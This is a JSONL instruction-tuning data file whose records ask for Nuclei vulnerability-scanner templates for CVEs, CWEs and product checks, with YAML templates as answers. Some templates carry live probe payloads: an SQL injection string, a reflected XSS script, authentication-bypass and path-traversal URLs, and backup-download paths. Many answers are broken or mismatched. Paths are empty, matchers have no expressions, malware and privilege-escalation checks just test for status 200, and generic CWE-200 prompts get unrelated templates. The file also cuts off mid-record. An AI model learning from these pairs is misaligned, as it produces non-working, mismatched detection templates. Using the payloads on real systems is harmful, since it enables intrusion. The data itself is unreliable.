discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: default-payara-server-page\n\ninfo:\n name: Payara Server Default Page\n author: dhiyaneshDk\n severity: info\n description: Payara Server Default Page\n tags: tech,payara,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Payara Server - Server Running\" \n part: body", "category": "generic", "severity": "info", "id": "default-payara-server-page"} {"instruction": "Generate a Nuclei template to detect Improper Authentication", "input": "Title: Improper Authentication (CWE-287)\nSummary: When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.\nVulnerability Type: Improper Authentication\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: netgear-wac124-router-auth-bypass\n\ninfo:\n name: NETGEAR WAC124 - Authentication Bypass\n author: gy741\n severity: high\n description: NETGEAR WAC124 AC2000 routers contain an authentication bypass vulnerability. An attacker can gain access by bypassing proper authentication, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: netgear,auth-bypass,router,iot,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup.cgi?next_file=debug.htm&x=currentsetting.htm\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Enable Telnet\"", "category": "cwe", "severity": "high", "id": "CWE-287"} {"instruction": "Generate a Nuclei template for: Zerobounce API Test", "input": "Title: Zerobounce API Test\nSummary: Zerobounce API Test. Tags: token-spray, zerobounce\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-zerobounce\n\ninfo:\n name: Zerobounce API Test\n author: 0xpugal\n severity: info\n description: Zerobounce API Test\n tags: token-spray,zerobounce\n\nhttp:\n - method: GET\n path:\n - \"https://api.zerobounce.net/v2/getapiusage?api_key={{token}}&start_date=2018-01-01&end_date=2019-12-12\" \n matchers:\n - type: word\n words:\n - \"\"total\":\" \n - \"\"start_date\":\" \n - \"\"end_date\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-zerobounce"} {"instruction": "Generate a Nuclei template for: Load Balancer Creation Not Restricted by Type", "input": "Title: Load Balancer Creation Not Restricted by Type\nSummary: Load Balancer Creation Not Restricted by Type. Ensure that only compliant load balancer types can be used to create Google Cloud load balancers for the GCP projects and folders within your organization. The list of allowed load balancer types can only include values from the following list: INTERNAL_TCP_UDP, INTERNAL_HTTP_HTTPS, EXTERNAL_NETWORK_TCP_UDP, EXTERNAL_TCP_PROXY, EXTERNAL_SSL_PROXY, EXTERNAL_HTTP_HTTPS.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-org-load-balancer-types\n\ninfo:\n name: Load Balancer Creation Not Restricted by Type\n author: princechaddha\n severity: medium\n description: Ensure that only compliant load balancer types can be used to create Google Cloud load balancers for the GCP projects and folders within your organization. The list of allowed load balancer types can only include values from the following list: INTERNAL_TCP_UDP, INTERNAL_HTTP_HTTPS, EXTERNAL_NETWORK_TCP_UDP, EXTERNAL_TCP_PROXY, EXTERNAL_SSL_PROXY, EXTERNAL_HTTP_HTTPS.\n tags: cloud,devops,gcp,gcloud,resourcemanager,security,load-balancer,networking,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-org-load-balancer-types"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: booth\n\ninfo:\n name: Booth User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Booth user name information check was conducted.\n tags: osint,osint-shopping,booth,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://{{user}}.booth.pm/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"- BOOTH\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: MacGyver.cap Malware - Detect", "input": "Title: MacGyver.cap Malware - Detect\nSummary: MacGyver.cap Malware - Detect. Tags: malware, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: macgyver-malware\n\ninfo:\n name: MacGyver.cap Malware - Detect\n author: daffainfo\n severity: info\n description: MacGyver.cap Malware - Detect\n tags: malware,file\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "macgyver-malware"} {"instruction": "Generate a Nuclei template for: Image Pull Policy set to Always", "input": "Title: Image Pull Policy set to Always\nSummary: Image Pull Policy set to Always. Ensures that Kubernetes deployments have the image pull policy set to 'Always', which guarantees the most up-to-date version of the image is used.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: k8s-image-pull-policy-always\n\ninfo:\n name: Image Pull Policy set to Always\n author: princechaddha\n severity: low\n description: Ensures that Kubernetes deployments have the image pull policy set to 'Always', which guarantees the most up-to-date version of the image is used.\n tags: cloud,devops,kubernetes,k8s,devsecops,deployments,images,docker,k8s-cluster-security\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "k8s-image-pull-policy-always"} {"instruction": "Generate a Nuclei template for: Node - Privilege Escalation", "input": "Title: Node - Privilege Escalation\nSummary: Node - Privilege Escalation. Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-node\n\ninfo:\n name: Node - Privilege Escalation\n author: daffainfo\n severity: high\n description: Node.js is a popular open-source, cross-platform JavaScript runtime environment that executes JavaScript code outside of a web browser. It is commonly used for building scalable network applications and is known for its event-driven, non-blocking I/O model. Node.js is widely used for server-side scripting and has a large ecosystem of libraries and frameworks.\n tags: code,linux,node,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-node"} {"instruction": "Generate a Nuclei template for CVE-2022-2551", "input": "Title: Vulnerability (CWE-425) in snapcreek duplicator\nSummary: The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating.\nVulnerability Type: Vulnerability (CWE-425)\nSeverity: high\nAffected Products: snapcreek duplicator\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2551\n\ninfo:\n name: WordPress Duplicator <1.4.7 - Authentication Bypass\n author: LRTK-CODER\n severity: high\n description: WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication.\n tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1\" \n - \"{{BaseURL}}/wp-content/dup-installer/main.installer.php?is_daws=1\" \n matchers:\n - type: word\n words:\n - \"
    restart this install process\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2022-2551"} {"instruction": "Generate a Nuclei template for CVE-2025-48954", "input": "Title: Cross-Site Scripting (XSS) in discourse discourse\nSummary: Discourse is an open-source discussion platform. Versions prior to 3.5.0.beta6 are vulnerable to cross-site scripting when the content security policy isn't enabled when using social logins. Version 3.5.0.beta6 patches the issue. As a workaround, have the content security policy enabled.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: discourse discourse\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-48954\n\ninfo:\n name: Discourse OAuth Social Login - Cross-site Scripting\n author: ferreiraklet,DhiyaneshDK,pdresearch\n severity: high\n description: Discourse versions prior to 3.5.0.beta6 contain a stored Cross-Site Scripting (XSS) vulnerability in the OAuth/social login functionality. The vulnerability is caused by lack of proper content security policy enforcement when processing social login failures,allowing remote attackers to inject and execute malicious scripts in users' browsers.\n tags: cve,cve2025,discourse,xss,oauth,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/failure?provider={{redirect_payload}}\" \n - \"{{BaseURL}}/auth/failure?provider={{basic_xss}}\" \n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-48954"} {"instruction": "Generate a Nuclei template for CVE-2023-38035", "input": "Title: Vulnerability (CWE-863) in ivanti mobileiron_sentry\nSummary: A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: critical\nAffected Products: ivanti mobileiron_sentry\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-38035\n\ninfo:\n name: Ivanti Sentry - Authentication Bypass\n author: DhiyaneshDk,iamnoooob,rootxharsh\n severity: critical\n description: A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-38035"} {"instruction": "Generate a Nuclei template for: Airtable API Test", "input": "Title: Airtable API Test\nSummary: Airtable API Test. Integrate with Airtable. Tags: token-spray, airtable\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-airtable\n\ninfo:\n name: Airtable API Test\n author: daffainfo\n severity: info\n description: Integrate with Airtable\n tags: token-spray,airtable\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"bases\"\" \n - \"\"id\"\" \n - \"\"name\"\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-airtable"} {"instruction": "Generate a Nuclei template for: TIBCO Spotfire Statistics Services - Detect", "input": "Title: TIBCO Spotfire Statistics Services - Detect\nSummary: TIBCO Spotfire Statistics Services - Detect. TIBCO Spotfire Statistics Services was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: tibco-spotfire-services-detect\n\ninfo:\n name: TIBCO Spotfire Statistics Services - Detect\n author: righettod\n severity: info\n description: TIBCO Spotfire Statistics Services was detected.\n tags: tech,tibco,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/SplusServer/\" \n - \"{{BaseURL}}/RServer/\" \n - \"{{BaseURL}}/TERR/\" \n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: or", "category": "generic", "severity": "info", "id": "tibco-spotfire-services-detect"} {"instruction": "Generate a Nuclei template for: AEM Secrets - Sensitive Information Disclosure", "input": "Title: AEM Secrets - Sensitive Information Disclosure\nSummary: AEM Secrets - Sensitive Information Disclosure. Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: aem-secrets\n\ninfo:\n name: AEM Secrets - Sensitive Information Disclosure\n author: boobooHQ,j3ssie\n severity: high\n description: Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc.\n tags: aem,adobe,misconfig,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json\" \n - \"{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json\" \n matchers:\n - type: word\n words:\n - \"\"jcr:uuid\"\" \n - \"\"jcr:createdBy\"\" \n - \"\"uri\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "aem-secrets"} {"instruction": "Generate a Nuclei template for: Insecure cross-domain.xml file", "input": "Title: Insecure cross-domain.xml file\nSummary: Insecure cross-domain.xml file. Tags: exposure, generic, files\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: insecure-crossdomain\n\ninfo:\n name: Insecure cross-domain.xml file\n author: Borna Nematzadeh,nadino\n severity: info\n description: Insecure cross-domain.xml file\n tags: exposure,generic,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/crossdomain.xml\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\" \n part: body", "category": "generic", "severity": "info", "id": "insecure-crossdomain"} {"instruction": "Generate a Nuclei template for: rConfig Security Checks", "input": "Title: rConfig Security Checks\nSummary: rConfig Security Checks. A simple workflow that runs all rConfig related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: rconfig-workflow\n\ninfo:\n name: rConfig Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all rConfig related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "rconfig-workflow"} {"instruction": "Generate a Nuclei template for: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting", "input": "Title: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting\nSummary: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting. GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: geovision-geowebserver-lfi-xss\n\ninfo:\n name: GeoVision Geowebserver <= 5.3.3 - Local File Inclusion / Cross-Site Scripting\n author: shamo0\n severity: high\n description: GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS, HTML Injection, and Local File Include (LFI) vectors. The application fails to properly sanitize user requests, allowing injection of HTML code and XSS, as well as client-side exploitation, including session theft.\n tags: geovision,geowebserver,lfi,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "geovision-geowebserver-lfi-xss"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wp-knews-xss\n\ninfo:\n name: WordPress Knews Multilingual Newsletters 1.1.0 - Cross-Site Scripting\n author: daffainfo\n severity: high\n description: WordPress Knews Multilingual Newsletters 1.1.0 plugin contains a cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: wordpress,xss,wp-plugin,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Knews Multilingual Newsletters\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/knews/wysiwyg/fontpicker/?ff=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template for: Zen Cart Installer", "input": "Title: Zen Cart Installer\nSummary: Zen Cart Installer. Zen Cart is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: zencart-installer\n\ninfo:\n name: Zen Cart Installer\n author: DhiyaneshDk\n severity: high\n description: Zen Cart is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,zencart,install,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/zc_install/index.php\" \n matchers:\n - type: word\n words:\n - \"Zen Cart® Installer\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "zencart-installer"} {"instruction": "Generate a Nuclei template for: Default VPC Network In Use", "input": "Title: Default VPC Network In Use\nSummary: Default VPC Network In Use. Ensure that your Google Cloud Platform (GCP) projects are not using the default Virtual Private Cloud (VPC) network. Using the default VPC network does not adhere to security best practices and may not meet specific networking requirements.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: gcloud-default-vpc-in-use\n\ninfo:\n name: Default VPC Network In Use\n author: princechaddha\n severity: medium\n description: Ensure that your Google Cloud Platform (GCP) projects are not using the default Virtual Private Cloud (VPC) network. Using the default VPC network does not adhere to security best practices and may not meet specific networking requirements.\n tags: cloud,devops,gcp,gcloud,google-cloud-vpc,networking,security,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "gcloud-default-vpc-in-use"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: openam-panel\n\ninfo:\n name: OpenAM Login Panel - Detect\n author: philippedelteil\n severity: info\n description: OpenAM login panel was detected.\n tags: panel,openam,opensso,login,forgerock,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}{{paths}}\" \n matchers:\n - type: word\n words:\n - \"urlArgs: \"v=\" \n - \"Sign in to OpenAM\" \n - \"ForgeRock\" \n - \"forgerock\" \n - \"FRForgotUsername\" \n - \"successfulUserRegistrationDestination\" \n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2024-1208", "input": "Title: Unknown Vulnerability in learndash learndash\nSummary: The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: learndash learndash\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-1208\n\ninfo:\n name: LearnDash LMS < 4.10.3 - Sensitive Information Exposure\n author: ritikchaddha\n severity: medium\n description: The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n tags: cve,cve2024,wp,wp-plugin,wordpress,exposure,learndash,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-json/wp/v2/sfwd-question\" \n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"question_type\":\" \n - \"\"points_total\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-1208"} {"instruction": "Generate a Nuclei template to detect SQL Injection", "input": "Title: SQL Injection (CWE-89)\nSummary: The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.\nVulnerability Type: SQL Injection\nSeverity: critical\nIndicators: vulnerability detected, error", "output": "id: duomicms-sql-injection\n\ninfo:\n name: Duomi CMS - SQL Injection\n author: pikpikcu\n severity: critical\n description: Duomi CMS contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n tags: duomicms,sqli,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5({{num}})))\" \n matchers:\n - type: word\n words:\n - \"{{md5({{num}})}}\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "critical", "id": "CWE-89"} {"instruction": "Generate a Nuclei template for CVE-2020-23697", "input": "Title: Cross-Site Scripting (XSS) in monstra monstra_cms\nSummary: Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the page feature in admin/index.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: monstra monstra_cms\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-23697\n\ninfo:\n name: Monstra CMS 3.0.4 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Monstra CMS 3.0.4 contains a cross-site scripting vulnerability via the page feature in admin/index.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated,monstra,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2020-23697"} {"instruction": "Generate a Nuclei template for CVE-2023-39109", "input": "Title: Vulnerability (CWE-918) in rconfig rconfig\nSummary: rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: rconfig rconfig\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39109\n\ninfo:\n name: rConfig 3.9.4 - Server-Side Request Forgery\n author: theamanrawat\n severity: high\n description: rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.\n tags: cve2023,cve,rconfig,authenticated,ssrf,lfi,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"rConfig\" \n part: body_1\n - type: regex\n part: body_3\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-39109"} {"instruction": "Generate a Nuclei template for CVE-2025-25231", "input": "Title: Path Traversal in CVE-2025-25231\nSummary: Omnissa Workspace ONE UEM contains a Secondary Context Path Traversal Vulnerability.\u00a0A malicious actor may be able to gain access to sensitive information by sending crafted GET requests (read-only) to restricted API endpoints.\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-25231\n\ninfo:\n name: Omnissa Workspace ONE UEM - Path Traversal\n author: DhiyaneshDK,slcyber\n severity: high\n description: Omnissa Workspace ONE UEM contains a path traversal caused by crafted GET requests to restricted API endpoints, letting malicious actors access sensitive information, exploit requires sending crafted requests.\n tags: cve,cve2025,omnissa,workspace,airwatch,traversal,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-25231"} {"instruction": "Generate a Nuclei template for: Veracore Login - Detect", "input": "Title: Veracore Login - Detect\nSummary: Veracore Login - Detect. A veracore login panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: veracore-panel\n\ninfo:\n name: Veracore Login - Detect\n author: rxerium\n severity: info\n description: A veracore login panel was detected.\n tags: panel,veracore,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/veracore/Home/#systems\" \n matchers:\n - type: word\n words:\n - \"VeraCore\" \n - \"/veracore/img/LoginLogo.png\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "veracore-panel"} {"instruction": "Generate a Nuclei template for: Gespage Security Checks", "input": "Title: Gespage Security Checks\nSummary: Gespage Security Checks. A simple workflow that runs all Gespage related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: gespage-workflow\n\ninfo:\n name: Gespage Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all Gespage related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "gespage-workflow"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: unauthenticated-frp\n\ninfo:\n name: FRPS Dashboard - Detect\n author: pikpikcu\n severity: info\n description: FRPS Dashboard panel was detected.\n tags: frp,unauth,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/\" \n matchers:\n - type: word\n words:\n - \"frps dashboard\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Frameio API Token", "input": "Title: Frameio API Token\nSummary: Frameio API Token. Tags: frameio, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: frameio-token\n\ninfo:\n name: Frameio API Token\n author: DhiyaneshDK\n severity: info\n description: Frameio API Token\n tags: frameio,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "frameio-token"} {"instruction": "Generate a Nuclei template for CVE-2021-25078", "input": "Title: Cross-Site Scripting (XSS) in wpaffiliatemanager affiliates_manager\nSummary: The Affiliates Manager WordPress plugin before 2.9.0 does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: wpaffiliatemanager affiliates_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-25078\n\ninfo:\n name: Affiliates Manager < 2.9.0 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: The plugin does not validate, sanitise and escape the IP address of requests logged by the click tracking feature, allowing unauthenticated attackers to perform Cross-Site Scripting attacks against admin viewing the tracked requests.\n tags: cve2021,cve,wp,wordpress,authenticated,affiliates-manager,wp-plugin,xss,wpscan,wpaffiliatemanager,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-25078"} {"instruction": "Generate a Nuclei template for: Microsoft Exchange Server Detect", "input": "Title: Microsoft Exchange Server Detect\nSummary: Microsoft Exchange Server Detect. Check for presence of Exchange Server using Outlook Web App path data.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ms-exchange-server\n\ninfo:\n name: Microsoft Exchange Server Detect\n author: pikpikcu,dhiyaneshDK\n severity: info\n description: Check for presence of Exchange Server using Outlook Web App path data.\n tags: microsoft,exchange,tech,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/owa/auth/logon.aspx\" \n matchers:\n - type: regex\n part: header\n - type: regex\n part: body\n - type: word\n words:\n - \"Exchange Log In\" \n - \"Microsoft Exchange - Outlook Web Access\"", "category": "generic", "severity": "info", "id": "ms-exchange-server"} {"instruction": "Generate a Nuclei template for CVE-2025-29925", "input": "Title: Vulnerability (CWE-402) in xwiki xwiki\nSummary: XWiki Platform is a generic wiki platform. Prior to 15.10.14, 16.4.6, and 16.10.0-rc-1, protected pages are listed when requesting the REST endpoints /rest/wikis/[wikiName]/pages even if the user doesn't have view rights on them. It's particularly true if the entire wiki is protected with \"Prevent unregistered user to view pages\": the endpoint would still list the pages of the wiki, though only for the main wiki. The problem has been patched in XWiki 15.10.14, 16.4.6, 16.10.0RC1. In those versions the endpoint can still be requested but the result is filtered out based on pages rights.\nVulnerability Type: Vulnerability (CWE-402)\nSeverity: medium\nAffected Products: 